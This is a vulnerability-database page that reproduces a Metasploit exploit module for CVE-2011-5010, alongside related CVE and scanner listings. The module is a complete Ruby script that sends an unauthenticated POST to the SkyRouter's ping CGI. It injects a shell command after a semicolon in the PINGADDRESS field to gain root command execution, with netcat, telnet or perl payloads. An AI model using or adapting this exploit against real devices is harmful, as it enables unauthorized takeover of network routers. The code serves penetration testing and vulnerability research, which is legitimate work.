Lucene search
K

CTEK SkyRouter 4200 and 4300 Command Execution

🗓️ 29 Nov 2011 09:30:49Reported by savant42Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 13 Views

CTEK SkyRouter 4200 and 4300 Command Execution module exploits unauthenticated remote root exploit within ctek SkyRouter 4200 and 430

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2011-5010
30 Nov 201100:00
circl
CVE
CVE-2011-5010
25 Dec 201101:00
cve
Cvelist
CVE-2011-5010
25 Dec 201101:00
cvelist
NVD
CVE-2011-5010
25 Dec 201101:55
nvd
OpenVAS
Ctek SkyRouter 4200 and 4300 Series Routers Remote Arbitrary Command Execution Vulnerability
25 Apr 201200:00
openvas
OpenVAS
Ctek SkyRouter 4200 and 4300 Series Routers Remote Arbitrary Command Execution Vulnerability
25 Apr 201200:00
openvas
Prion
Deserialization of untrusted data
25 Dec 201101:55
prion
VulnCheck KEV
VulnCheck KEV: CVE-2011-5010
1 Dec 202000:00
vulncheck_kev
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'CTEK SkyRouter 4200 and 4300 Command Execution',
      'Description'    => %q{
          This module exploits an unauthenticated remote root exploit within ctek SkyRouter 4200 and 4300.
      },
      'Author'         => [ 'savant42' ],  #with module help from kos
      'License'        => MSF_LICENSE,
      'References'     => [
                  ['CVE', '2011-5010'],
                  ['OSVDB', '77497']
                ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 1024,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl telnet netcat netcat-e',
            }
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        => [[ 'Automatic', { }]],
      'DisclosureDate' => '2011-09-08', # CGI historical date :)
      'DefaultTarget' => 0))

  end

  def exploit
    post_data = "MYLINK=%2Fapps%2Fa3%2Fcfg_ethping.cgi&CMD=u&PINGADDRESS=;" + Rex::Text.uri_encode(payload.encoded) + "+%26"
    uri    = '/apps/a3/cfg_ethping.cgi'
    print_status("Sending HTTP request for #{uri}")
    res = send_request_cgi( {
      'global' => true,
      'uri'    => uri,
      'method' => "POST",
      'data' => post_data
    }, 30)

    if res
      print_status("The server responded with HTTP CODE #{res.code}")
    else
      print_status("The server did not respond to our request")
    end

    handler
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation